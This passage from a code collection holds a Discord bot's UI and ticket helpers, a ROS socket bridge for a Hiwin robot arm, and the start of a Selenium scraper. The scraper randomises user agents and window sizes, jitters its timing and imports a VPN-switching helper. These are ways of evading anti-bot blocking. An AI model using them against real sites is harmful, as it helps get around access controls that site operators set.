        self.coroutine = coroutine
        self.view_response = view_response

        # Build the base kwargs once instead of duplicating the super() call;
        # custom_id is only forwarded when one was actually provided.
        select_kwargs = dict(
            options=self.options_,
            placeholder=self.placeholder_,
            disabled=self.disabled_,
            max_values=self.max_values_,
            min_values=self.min_values_,
        )
        if self.custom_id_:
            select_kwargs["custom_id"] = self.custom_id_
        super().__init__(**select_kwargs)

    async def callback(self, interaction: discord.Interaction):
        # Allow the interaction when no user restriction was set, when the
        # invoking user matches, or when the user holds one of the allowed roles.
        # BUG FIX: `self.roles` defaults to None; the original iterated it
        # directly, raising TypeError whenever a non-matching user interacted
        # with a menu created without roles.
        allowed_roles = self.roles or []
        if self.select_user in [None, interaction.user] or any(
            role in interaction.user.roles for role in allowed_roles
        ):

            if self.custom_id_ is None:
                self.view.value = self.values[0]
            else:
                # self.view.value = self.custom_id_
                self.view_response = self.values[0]

            if self.interaction_message_:
                await interaction.response.send_message(
                    content=self.interaction_message_, ephemeral=self.ephemeral_
                )

            if self.coroutine is not None:
                await self.coroutine(interaction, self.view)
            else:
                self.view.stop()
        else:
            await interaction.response.send_message(
                content="You're not allowed to interact with that!", ephemeral=True
            )
class ButtonHandler(ui.Button):
    """
    Adds a Button to a specific message and returns it's value when pressed.

    Usage:
    To do something after the callback function is invoked (the button is pressed), you have to pass a
    coroutine to the class. IMPORTANT: The coroutine has to take two arguments (discord.Interaction, discord.View)
    to work.
    """

    def __init__(
        self,
        style: ButtonStyle,
        label: str,
        custom_id: typing.Union[str, None] = None,
        emoji: typing.Union[str, None] = None,
        url: typing.Union[str, None] = None,
        disabled: bool = False,
        button_user: typing.Union[discord.Member, discord.User, None] = None,
        roles: List[discord.Role] = None,
        interaction_message: typing.Union[str, None] = None,
        ephemeral: bool = True,
        coroutine: coroutineType = None,
    ):
        """
        Parameters:
            style: Style for this button.
            label: Label for the button.
            custom_id: Custom ID that represents this button. Default to None.
            emoji: An emoji for this button. Default to None.
            url: A URL for this button. Default to None.
            disabled: Whenever the button should be disabled or not. Default to False.
            button_user: The user that can perform this action, leave blank for everyone. Defaults to None.
            roles: The roles which the user needs to be able to click the button.
            interaction_message: The response message when pressing on a selection. Default to None.
            ephemeral: Whenever the response message should only be visible for the select_user or not. Default to True.
            coroutine: A coroutine that gets invoked after the button is pressed. If None is passed, the view is stopped after the button is pressed. Default to None.
        """
        # NOTE: the original docstring had the style/label/custom_id
        # descriptions shifted by one; corrected above.
        self.style_ = style
        self.label_ = label
        self.custom_id_ = custom_id
        self.emoji_ = emoji
        self.url_ = url
        self.disabled_ = disabled
        self.button_user = button_user
        self.roles = roles
        self.interaction_message_ = interaction_message
        self.ephemeral_ = ephemeral
        self.coroutine = coroutine

        # Build the base kwargs once instead of duplicating the super() call;
        # custom_id is only forwarded when one was actually provided.
        button_kwargs = dict(
            style=self.style_,
            label=self.label_,
            emoji=self.emoji_,
            url=self.url_,
            disabled=self.disabled_,
        )
        if self.custom_id_:
            button_kwargs["custom_id"] = self.custom_id_
        super().__init__(**button_kwargs)

    async def callback(self, interaction: discord.Interaction):
        # BUG FIX: `self.roles` defaults to None; the original iterated it
        # directly, raising TypeError whenever a non-matching user clicked a
        # button created without roles.
        allowed_roles = self.roles or []
        if self.button_user in [None, interaction.user] or any(
            role in interaction.user.roles for role in allowed_roles
        ):
            if self.custom_id_ is None:
                self.view.value = None
            else:
                self.view.value = self.custom_id_

            if self.interaction_message_:
                await interaction.response.send_message(
                    content=self.interaction_message_, ephemeral=self.ephemeral_
                )

            if self.coroutine is not None:
                await self.coroutine(interaction, self.view)
            else:
                self.view.stop()
        else:
            await interaction.response.send_message(
                content="You're not allowed to interact with that!", ephemeral=True
            )
def getGuildList(bot: commands.Bot, exemptServer: List[int] = None) -> list:
    """
    Return the IDs of every guild the bot is connected to.

    Parameters:
        bot: The bot whose guilds are listed.
        exemptServer: Guild IDs to exclude. Defaults to None (exclude none).
    """
    # BUG FIX: the original unconditionally evaluated `guild.id in exemptServer`,
    # which raised TypeError whenever the default None was used.
    exempt = exemptServer or []
    return [guild.id for guild in bot.guilds if guild.id not in exempt]
class TechnicalCommissionConfirm(discord.ui.View):
    """
    Confirm/Cancel view shown before a technical-commission channel is closed.
    Confirm exports a transcript and deletes the channel; Cancel aborts.
    """

    def __init__(self, bot):
        super().__init__()
        # Set by the Cancel button; read by the caller after the view stops.
        self.value = None
        self.bot = bot

    @discord.ui.button(
        label="Confirm",
        style=discord.ButtonStyle.green,
        emoji="✅",
        custom_id="persistent_view:tempconfirm",
    )
    async def confirm(
        self, button: discord.ui.Button, interaction: discord.Interaction
    ):
        # Export the channel transcript to the ticket-log channel, then delete
        # the channel itself. rawExport/TECH_ID are defined elsewhere in this module.
        TranscriptLOG = self.bot.get_channel(TECH_ID.ch_ticketLog)
        ch = await self.bot.fetch_channel(interaction.channel_id)
        await rawExport(self, ch, TranscriptLOG, interaction.user)
        await ch.delete()

    @discord.ui.button(label="Cancel", style=discord.ButtonStyle.red, emoji="❌")
    async def cancel(self, button: discord.ui.Button, interaction: discord.Interaction):
        await interaction.message.delete()
        await interaction.response.send_message(
            "ok, not removing this channel.", ephemeral=True
        )
        self.value = False
        self.stop()
class LockButton(discord.ui.View):
    """
    Persistent view exposing a "Lock" button that starts the close-ticket
    confirmation flow (TechnicalCommissionConfirm) in the current channel.
    """

    def __init__(self, bot):
        # timeout=None makes the view persistent across bot restarts.
        super().__init__(timeout=None)
        self.value = None
        self.bot = bot

    @discord.ui.button(
        label="Lock",
        style=discord.ButtonStyle.green,
        custom_id="persistent_view:lock",
        emoji="🔒",
    )
    async def lock(self, button: discord.ui.Button, interaction: discord.Interaction):
        """Ask the user to confirm before the channel is exported and deleted."""
        self.value = True
        ch = await self.bot.fetch_channel(interaction.channel_id)
        # The sent message was bound to an unused local (`msg`) in the
        # original; the binding has been dropped.
        await ch.send(
            "Are you sure you want to close this ticket?",
            view=TechnicalCommissionConfirm(self.bot),
        )
class GSuiteVerify(discord.ui.View):
    """
    Persistent view with a single "Verify with GSuite" button; pressing it
    only records that the button was clicked (self.value = True).
    """

    def __init__(self):
        # timeout=None makes the view persistent across bot restarts.
        super().__init__(timeout=None)
        self.value = None

    @discord.ui.button(
        label="Verify with GSuite",
        style=discord.ButtonStyle.blurple,
        custom_id="persistent_view:gsuiteverify",
        emoji=Emoji.gsuitelogo,
    )
    async def lock(self, button: discord.ui.Button, interaction: discord.Interaction):
        # No response is sent here; the click is only recorded.
        self.value = True
class TempConfirm(discord.ui.View):
    """
    Generic Confirm/Cancel view; after the view stops, self.value is True on
    confirm, False on cancel, or None if it timed out.
    """

    def __init__(self):
        super().__init__()
        self.value = None

    @discord.ui.button(
        label="Confirm",
        style=discord.ButtonStyle.green,
        emoji="✅",
        custom_id="persistent_view:tempconfirm",
    )
    async def confirm(
        self, button: discord.ui.Button, interaction: discord.Interaction
    ):
        self.value = True
        self.stop()

    @discord.ui.button(label="Cancel", style=discord.ButtonStyle.red, emoji="❌")
    async def cancel(self, button: discord.ui.Button, interaction: discord.Interaction):
        await interaction.response.send_message("Cancelling", ephemeral=True)
        self.value = False
        self.stop()
class NitroConfirmFake(discord.ui.View):
    """
    Joke view: a "Claim" button that responds with a rickroll GIF instead of
    Nitro. self.value is set to True after the response is sent.
    """

    def __init__(self):
        super().__init__()
        self.value = None

    @discord.ui.button(
        label="Claim",
        style=discord.ButtonStyle.green,
        custom_id="persistent_view:nitrofake",
    )
    async def claim(self, button: discord.ui.Button, interaction: discord.Interaction):
        try:
            await interaction.response.send_message(
                "https://images-ext-2.discordapp.net/external/YTk-6Mfxbbr8KwIc-3Pyy5Z_06tfpcO65MflxYgbjA8/%3Fcid%3D73b8f7b119cc9225923f70c7e25a1f8e8932c7ae8ef48fe7%26rid%3Dgiphy.mp4%26ct%3Dg/https/media2.giphy.com/media/Ju7l5y9osyymQ/giphy.mp4",
                ephemeral=True,
            )
        except discord.errors.InteractionResponded:
            # The interaction was already responded to elsewhere — fall back
            # to a follow-up message instead of failing.
            await interaction.followup.send(
                "https://images-ext-2.discordapp.net/external/YTk-6Mfxbbr8KwIc-3Pyy5Z_06tfpcO65MflxYgbjA8/%3Fcid%3D73b8f7b119cc9225923f70c7e25a1f8e8932c7ae8ef48fe7%26rid%3Dgiphy.mp4%26ct%3Dg/https/media2.giphy.com/media/Ju7l5y9osyymQ/giphy.mp4",
                ephemeral=True,
            )
        self.value = True
class TicketLockButton(discord.ui.View):
    """
    Persistent view exposing a "Lock" button that asks for confirmation
    (TicketTempConfirm) before a ticket channel is closed.

    NOTE(review): the custom_id "persistent_view:lock" is also used by
    LockButton; persistent views require unique custom_ids — confirm only one
    of the two is ever registered.
    """

    def __init__(self, bot):
        # timeout=None makes the view persistent across bot restarts.
        super().__init__(timeout=None)
        self.value = None
        self.bot = bot

    @discord.ui.button(
        label="Lock",
        style=discord.ButtonStyle.green,
        custom_id="persistent_view:lock",
        emoji="🔒",
    )
    async def lock(self, button: discord.ui.Button, interaction: discord.Interaction):
        """Send the close-ticket confirmation prompt to the current channel."""
        self.value = True
        ch = await self.bot.fetch_channel(interaction.channel_id)
        # BUG FIX: TicketTempConfirm.__init__ takes no arguments; the original
        # passed self.bot, which raised TypeError as soon as the button was
        # pressed. (Also dropped the unused `msg` binding.)
        await ch.send(
            "Are you sure you want to close this ticket?",
            view=TicketTempConfirm(),
        )
class TicketTempConfirm(discord.ui.View):
    """
    Confirm/Cancel view for closing a ticket; self.value is True on confirm,
    False on cancel, None on timeout.

    NOTE(review): this class is an exact duplicate of TempConfirm, and both
    reuse the custom_id "persistent_view:tempconfirm" (also used by
    TechnicalCommissionConfirm.confirm) — consider consolidating.
    """

    def __init__(self):
        super().__init__()
        self.value = None

    @discord.ui.button(
        label="Confirm",
        style=discord.ButtonStyle.green,
        emoji="✅",
        custom_id="persistent_view:tempconfirm",
    )
    async def confirm(
        self, button: discord.ui.Button, interaction: discord.Interaction
    ):
        self.value = True
        self.stop()

    @discord.ui.button(label="Cancel", style=discord.ButtonStyle.red, emoji="❌")
    async def cancel(self, button: discord.ui.Button, interaction: discord.Interaction):
        await interaction.response.send_message("Cancelling", ephemeral=True)
        self.value = False
        self.stop()
class FeedbackModel(discord.ui.Modal):
    """
    "Submit Feedback" modal; on submit, the answers are forwarded to Sentry's
    user-feedback endpoint, attached to the most recent Sentry event.
    """

    def __init__(self) -> None:
        super().__init__("Submit Feedback")
        self.add_item(
            discord.ui.InputText(
                label="What did you try to do?",
                style=discord.InputTextStyle.long,
            )
        )
        self.add_item(
            discord.ui.InputText(
                label="Describe the steps to reproduce the issue",
                style=discord.InputTextStyle.short,
            )
        )
        self.add_item(
            discord.ui.InputText(
                label="What happened?",
                style=discord.InputTextStyle.long,
            )
        )
        self.add_item(
            discord.ui.InputText(
                label="What was supposed to happen?",
                style=discord.InputTextStyle.long,
            )
        )
        self.add_item(
            discord.ui.InputText(
                label="Anything else?",
                style=discord.InputTextStyle.long,
                required=False,
            )
        )

    async def callback(self, interaction: discord.Interaction):
        """Forward the submitted answers to Sentry's user-feedback API."""
        feedback = (
            f"User Action: {self.children[0].value}\n"
            f"Steps to reproduce the issue: {self.children[1].value}\n"
            f"What happened: {self.children[2].value}\n"
            f"Expected Result: {self.children[3].value}\n"
            f"Anything else: {self.children[4].value}"
        )
        url = "https://sentry.io/api/0/projects/schoolsimplified/timmy/user-feedback/"
        headers = {"Authorization": f'Bearer {os.getenv("FDB_SENTRY")}'}
        payload = {
            "event_id": sentry_sdk.last_event_id(),
            "name": interaction.user.name,
            "id": interaction.user.id,
            "comments": feedback,
        }
        # BUG FIX: the original sent `data=str(payload)` — the Python repr()
        # of a dict, which is neither valid JSON nor form data. Send real
        # JSON so Sentry can parse the feedback.
        requests.post(url, headers=headers, json=payload)
class FeedbackButton(discord.ui.View):
    """
    View with a "Submit Feedback" button that opens the FeedbackModel modal.
    The view expires after 500 seconds.
    """

    def __init__(self):
        super().__init__(timeout=500.0)
        self.value = None

    @discord.ui.button(
        label="Submit Feedback",
        style=discord.ButtonStyle.blurple,
        custom_id="persistent_view:feedback_button",
        emoji="📝",
    )
    async def feedback_button(
        self, button: discord.ui.Button, interaction: discord.Interaction
    ):
        modal = FeedbackModel()
        return await interaction.response.send_modal(modal)
async def id_generator(size=3, chars=string.ascii_uppercase):
    """
    Generate a random session ID (default: 3 uppercase letters) that does not
    already exist in the TutorBot_Sessions table.
    """
    while True:
        candidate = "".join(random.choice(chars) for _ in range(size))
        clash = database.TutorBot_Sessions.select().where(
            database.TutorBot_Sessions.SessionID == candidate
        )
        # Keep drawing until the candidate is unused.
        if not clash.exists():
            return candidate
async def force_restart(ctx):
    """
    Restart the bot: report `git status`, spawn a fresh `main.py` process,
    then terminate the current process with sys.exit(0).

    NOTE(review): check=True on this first run means a failing `git status`
    raises CalledProcessError *before* any error embed is sent — confirm
    whether it should be inside the try block below.
    """
    p = subprocess.run(
        "git status -uno", shell=True, text=True, capture_output=True, check=True
    )

    embed = discord.Embed(
        title="Restarting...",
        description="Doing GIT Operation (1/3)",
        color=discord.Color.green(),
    )
    embed.add_field(
        name="Checking GIT (1/3)", value=f"**Git Output:**\n```shell\n{p.stdout}\n```"
    )

    msg = await ctx.send(embed=embed)
    try:
        # NOTE(review): `result` is unused, and this `cd && cd ...` runs in a
        # throwaway shell, so it does not change this process's working
        # directory nor affect the Popen below — confirm the intent.
        result = subprocess.run(
            "cd && cd Timmy-SchoolSimplified",
            shell=True,
            text=True,
            capture_output=True,
            check=True,
        )
        # Launch the replacement bot process; the daemon thread reaps its
        # output so the pipe does not fill up.
        theproc = subprocess.Popen([sys.executable, "main.py"])
        runThread = Thread(target=theproc.communicate)
        runThread.start()

        embed.add_field(
            name="Started Environment and Additional Process (2/3)",
            value="Executed `source` and `nohup`.",
            inline=False,
        )
        await msg.edit(embed=embed)

    except Exception as e:
        embed = discord.Embed(
            title="Operation Failed", description=e, color=discord.Color.red()
        )
        embed.set_footer(text="Main bot process will be terminated.")

        await ctx.send(embed=embed)

    else:
        embed.add_field(
            name="Killing Old Bot Process (3/3)",
            value="Executing `sys.exit(0)` now...",
            inline=False,
        )
        await msg.edit(embed=embed)
        # Hand over to the freshly spawned process.
        sys.exit(0)
def getHostDir():
    """Return the ``/home/<HOST>`` prefix of this script's resolved path.

    On the VPS, <HOST> is either ``timmya`` or ``timmy-beta``; anywhere else
    the pattern does not match and ``None`` is returned. The resolved path
    and the extracted prefix are printed for debugging.
    NOTE: THIS ONLY WORKS ON THE VPS.
    """
    script_path = os.path.realpath(__file__)
    print(script_path)
    match = re.search("/home/[^/]*", script_path)
    host_dir = match.group(0) if match is not None else None
    print(host_dir)
    return host_dir
def stringTimeConvert(string: str):
    """Extract time units from a string such as ``'2d 4h 6m 7s'``.

    The order of the units does not matter ('6m 2d 7s 4h' works too).

    Args:
        string: Text containing any of ``<n>d``, ``<n>h``, ``<n>m``, ``<n>s``.

    Returns:
        dict: Keys ``'days'``, ``'hours'``, ``'minutes'``, ``'seconds'``; each
        value is the matched ``int``, or ``None`` when that unit is absent.
    """
    # BUG FIX: raw strings — a bare "\d" is an invalid escape sequence and
    # warns (SyntaxWarning) on modern Python.
    units = {
        "days": r"\d+d",
        "hours": r"\d+h",
        "minutes": r"\d+m",
        "seconds": r"\d+s",
    }
    timeDict: dict = {}
    for name, pattern in units.items():
        match = re.search(pattern, string)
        # Drop the trailing unit letter before converting to int.
        timeDict[name] = int(match.group(0)[:-1]) if match is not None else None
    return timeDict
def searchCustomEmoji(string: str):
    """Find the first custom Discord emoji token in *string*.

    Matches both static ``<:name:id>`` and animated ``<a:name:id>`` forms.

    Args:
        string: The text to search.

    Returns:
        The full emoji token as a ``str``, or ``None`` if nothing was found.
    """
    # BUG FIX: raw string — a bare "\d" is an invalid escape sequence and
    # warns (SyntaxWarning) on modern Python.
    match = re.search(r"<[^:]*:[^:]*:(\d)+>", string)
    return match.group(0) if match is not None else None
HiwinRA605_socket_ros_test_20190626123236.py | #!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
# Module-level state shared between the ROS service callbacks and the
# socket-client thread.
Socket = 0  # socket object once connected (0 until socket_client() runs)
data = '0'  # initial value of the payload sent to the arm controller
Arm_feedback = 1  # assume the arm is busy at start-up
state_feedback = 0
NAME = 'socket_server'
client_response = 0  # initial count of replies returned to the client
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
    """Simple container for a Cartesian pose (position + orientation)."""

    def __init__(self, x, y, z, pitch, roll, yaw):
        # Store the six pose components verbatim.
        self.x, self.y, self.z = x, y, z
        self.pitch, self.roll, self.yaw = pitch, roll, yaw


# Module-level pose updated in place by the ROS callbacks.
pos = point(0, 36.8, 11.35, -90, 0, 0)
##------------class socket_cmd---------
class socket_cmd():
    """Holds the most recent arm command parameters received over ROS.

    NOTE: the service callbacks in this module set these as *class*
    attributes rather than instantiating the class.
    """

    def __init__(self, grip, setvel, ra, delay, setboth, action, Speedmode):
        # Copy every constructor argument onto the instance unchanged.
        fields = (
            ("grip", grip), ("setvel", setvel), ("ra", ra), ("delay", delay),
            ("setboth", setboth), ("action", action), ("Speedmode", Speedmode),
        )
        for name, value in fields:
            setattr(self, name, value)
##-----------switch define------------##
class switch(object):
    """C-style switch/case with fall-through (the classic Python recipe).

    Usage::

        for case in switch(value):
            if case(1):
                ...; break
            if case(2, 3):
                ...; break

    ``case(*args)`` returns True when ``value`` is in ``args`` or when a
    previous case already matched (fall-through); ``case()`` with no
    arguments acts as the default branch.
    """

    def __init__(self, value):
        self.value = value
        self.fall = False  # becomes True once a case matched (fall-through)

    def __iter__(self):
        """Return the match method once, then stop."""
        yield self.match
        # BUG FIX: 'raise StopIteration' inside a generator has been a
        # RuntimeError since Python 3.7 (PEP 479); a plain return ends the
        # iteration cleanly when no case matched and the loop exhausts.
        return

    def match(self, *args):
        """Indicate whether or not to enter a case suite"""
        if self.fall or not args:
            return True
        elif self.value in args:  # changed for v1.5, see below
            self.fall = True
            return True
        else:
            return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
    """Forward the arm's busy/ready state over the 'arm_state' ROS service.

    Blocks until the service is available, calls it with ``Arm_state``, and
    stores the response in the module-level ``state_feedback`` (also
    returned). Service errors are printed, not raised.
    """
    global state_feedback
    rospy.wait_for_service('arm_state')
    try:
        proxy = rospy.ServiceProxy('arm_state', arm_state)
        state_feedback = proxy(Arm_state)
        return state_feedback
    except rospy.ServiceException as e:
        print("Service call failed: %s" % e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
    """Forward the packet-sent flag over the 'sent_flag' ROS service.

    Blocks until the service is available, calls it with ``Sent_flag``, and
    stores the response in the module-level ``sent_feedback`` (also
    returned). Service errors are printed, not raised.
    """
    global sent_feedback
    rospy.wait_for_service('sent_flag')
    try:
        proxy = rospy.ServiceProxy('sent_flag', sent_flag)
        sent_feedback = proxy(Sent_flag)
        return sent_feedback
    except rospy.ServiceException as e:
        print("Service call failed: %s" % e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req):
    """ROS service callback: receive a target pose from the strategy side.

    Copies the six pose fields into the module-level ``pos`` (as strings),
    raises the point-data flag, and returns the running response count.
    """
    global client_response, point_data_flag
    # str() mirrors the original '%s' formatting: fields are stored as text.
    pos.x = str(req.x)
    pos.y = str(req.y)
    pos.z = str(req.z)
    pos.pitch = str(req.pitch)
    pos.roll = str(req.roll)
    pos.yaw = str(req.yaw)
    point_data_flag = True
    client_response += 1
    return client_response
##----------Arm Mode-------------###
def Arm_Mode(req):
    """ROS service callback: receive arm-mode parameters from the strategy side.

    Stores the command fields as *class* attributes on ``socket_cmd``, raises
    the mode flag, pushes the command to the arm via ``Socket_command()``,
    and returns 1 as acknowledgement.
    """
    global arm_mode_flag
    # int(str(...)) mirrors the original int('%s' % ...) round-trip.
    socket_cmd.action = int(str(req.action))
    socket_cmd.grip = int(str(req.grip))
    socket_cmd.ra = int(str(req.ra))
    socket_cmd.setvel = int(str(req.vel))
    socket_cmd.setboth = int(str(req.both))
    arm_mode_flag = True
    Socket_command()
    print("cmd")
    return 1
##-------Arm Speed Mode------------###
def Speed_Mode(req):
    """ROS service callback: receive the arm speed mode from the strategy side.

    Stores the mode as a class attribute on ``socket_cmd``, raises the
    speed-mode flag, and returns 1 as acknowledgement.
    """
    global speed_mode_flag
    socket_cmd.Speedmode = int(str(req.Speedmode))
    speed_mode_flag = True
    return 1
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server():
    """Create the ROS server node and register the command services."""
    rospy.init_node(NAME)
    # Handlers for arm mode, arm pose, and speed mode from the strategy PC.
    rospy.Service('arm_mode', arm_mode, Arm_Mode)
    rospy.Service('arm_pos', arm_data, point_data)
    rospy.Service('speed_mode', speed_mode, Speed_Mode)
    #c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
    print("Ready to connect")
    rospy.spin()
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
    """Build the TCP command string from the current socket_cmd state and
    send it to the arm controller over the module-level Socket.

    Dispatch uses the switch/case recipe: the outer switch selects the
    action type (PtP / Line / SetVel / Delay / speed mode), the inner switch
    selects the control mode (position / Euler / both). Afterwards the
    action is reset to 5 (idle) and the packet is sent UTF-8 encoded.

    NOTE(review): if socket_cmd.action matches no case, 'data' is unbound at
    the send below (NameError risk) — confirm callers always set a known
    action type before this runs.
    """
    global arm_mode_flag,speed_mode_flag,point_data_flag
    if arm_mode_flag == True:
        # Consume all pending-update flags before building the packet.
        arm_mode_flag = False
        speed_mode_flag = False
        point_data_flag = False
        for case in switch(socket_cmd.action):
            #-------PtP (point-to-point) mode--------
            if case(Taskcmd.Action_Type.PtoP):
                for case in switch(socket_cmd.setboth):
                    if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                        data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                        data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                        data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                break
            #-------Line (linear motion) mode--------
            if case(Taskcmd.Action_Type.Line):
                for case in switch(socket_cmd.setboth):
                    if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                        data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                        data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                        data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                        break
                break
            #-------Set arm speed--------
            if case(Taskcmd.Action_Type.SetVel):
                data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
                break
            #-------Set arm delay time--------
            if case(Taskcmd.Action_Type.Delay):
                data = TCP.SetDelay(socket_cmd.grip,0)
                break
            #-------Set arm fast / safe speed mode--------
            if case(Taskcmd.Action_Type.Mode):
                data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
                break
        socket_cmd.action= 5 ## reset to the initial (idle) mode
        Socket.send(data.encode('utf-8'))# send the command string over the socket
##-----------socket client--------
def socket_client():
    """Connect to the arm-controller PC and pump its feedback into ROS.

    Opens a TCP connection to 192.168.0.1:8080, then loops reading
    1024-byte feedback packets. Byte [2] encodes the arm state as an ASCII
    code ('F'=70 ready, 'T'=84 busy, '6'=54 strategy finished) and byte [4]
    encodes the sent flag ('0'=48 / '1'=49); each is forwarded to the
    matching ROS service. The loop exits when the arm reports shutdown,
    after which the shutdown hook is registered and the socket is closed.
    """
    global Socket,Arm_feedback,data,Socket_sent_flag
    try:
        Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        Socket.connect(('192.168.0.1', 8080))# iclab 5 & iclab hiwin controller
        #s.connect(('192.168.1.102', 8080))# iclab computer (alternate host)
    except socket.error as msg:
        print(msg)
        sys.exit(1)
    print('Connection has been successful')
    print(Socket.recv(1024))
    # Original interactive prompt (press 1 to start, 3 to quit) kept for
    # reference; transmission now starts unconditionally.
    #start_input=int(input('開始傳輸請按1,離開請按3 : '))
    start_input = 1
    if start_input==1:
        while 1:
            feedback_str = Socket.recv(1024)
            # Arm-state byte reported by the controller:
            if str(feedback_str[2]) == '70':# 'F': arm ready for the next motion command
                Arm_feedback = 0
                socket_client_arm_state(Arm_feedback)
                #print("isbusy false")
            if str(feedback_str[2]) == '84':# 'T': arm busy, cannot take another command
                Arm_feedback = 1
                socket_client_arm_state(Arm_feedback)
                #print("isbusy true")
            if str(feedback_str[2]) == '54':# '6': strategy finished
                Arm_feedback = 6
                socket_client_arm_state(Arm_feedback)
                print("shutdown")
            # Sent-flag byte:
            if str(feedback_str[4]) == '48':# '0' -> packet not sent (False)
                Socket_sent_flag = False
                socket_client_sent_flag(Socket_sent_flag)
            if str(feedback_str[4]) == '49':# '1' -> packet sent (True)
                Socket_sent_flag = True
                socket_client_sent_flag(Socket_sent_flag)
            ##--------------- end of feedback handling -----------------
            if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
                break
    if start_input == 3:
        rospy.on_shutdown(myhook)
    rospy.on_shutdown(myhook)
    Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
    """Thread entry point: runs the blocking socket-client loop."""
    socket_client()
## 多執行序 end
def myhook():
    """ROS shutdown hook: announce that the node is going down."""
    print("shutdown time!")
if __name__ == '__main__':
    # Start in the idle mode (5), run the socket client on a worker thread,
    # and serve ROS requests on the main thread until shutdown.
    socket_cmd.action = 5## reset to the initial (idle) mode
    t = threading.Thread(target=thread_test)
    t.start()  # start the socket-client thread
    socket_server()
    t.join()
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / Ctrl+[  Indent / outdent line
main.py | from selenium import webdriver
import time
from selenium.webdriver.firefox.options import Options
import os
import random
import json
import threading
from os import path
from requests import get
import tqdm
from html.parser import HTMLParser
import re
from datetime import datetime
from vpnswitch import *
class HTMLFilter(HTMLParser):
    """HTMLParser subclass that collects all visible text into ``text``."""

    text = ""

    def handle_data(self, data):
        # Accumulate every text fragment encountered while parsing.
        self.text = self.text + data
import os, sys, subprocess, json, argparse, signal
from subprocess import Popen, PIPE, STDOUT, TimeoutExpired
import random
from datetime import datetime
class OBJ:
    """Headless-Firefox scraping driver.

    Splits the IDs from ``inputfile`` across ``worker_count`` threads,
    queries ``url`` (a format string with one ``{}`` slot) for each ID using
    a random user agent, and appends results to ``outputfile``. A
    VPN-switching thread (``vpnsel``) runs alongside the workers.
    """

    def __init__(self,url,worker_count,user_agents,inputfile,outputfile,vpn,reset):
        # Configuration is taken verbatim from the JSON config file.
        self.user_agents = user_agents
        self.url = url
        self.worker_count = worker_count
        self.input_file = inputfile
        self.output_file = outputfile
        self.vpn = vpn      # VPN service name handed to vpnsel
        self.reset = reset  # VPN refresh interval handed to vpnsel

    def randagent(self):
        """Return a random user-agent string from the configured pool."""
        return random.choice(self.user_agents)

    def search(self,job,id,reset_time=60):
        """Fetch the page for one job ID and return its visible text.

        Launches a fresh headless Firefox per attempt, loads
        ``self.url.format(job)``, strips markup via HTMLFilter, and returns
        the text. On failure it retries after ``reset_time`` seconds; after
        more than 3 failures it gives up.

        NOTE(review): the failure value is the tuple ``(-1, -1)`` while the
        success value is a string — callers must handle both shapes.
        """
        count = 0  # consecutive failure counter
        while True:
            time.sleep(random.random())  # jitter between attempts
            try:
                options = Options()
                options.add_argument('--headless')
                print("Worker",id,"INIT")
                # Randomize the user agent for this browser session.
                profile = webdriver.FirefoxProfile()
                profile.set_preference("general.useragent.override", self.randagent())
                driver = webdriver.Firefox(options=options, firefox_profile=profile)
                # Random window size, presumably to vary the fingerprint.
                driver.set_window_size(random.randint(500,1000), random.randint(500,1000))
                driver.set_page_load_timeout(15)
                print("Worker",id,"Agent:",driver.execute_script("return navigator.userAgent"))
                time.sleep(random.random()*5)
                query_url = self.url.format(job)
                print("Worker",id,"Query",query_url)
                driver.get(query_url)
                raw_source = driver.page_source
                driver.quit()
                del driver
                print("Worker",id,"Response:")
                print(datetime.now().time().strftime("%H:%M:%S"))
                # Reduce the HTML to its visible text.
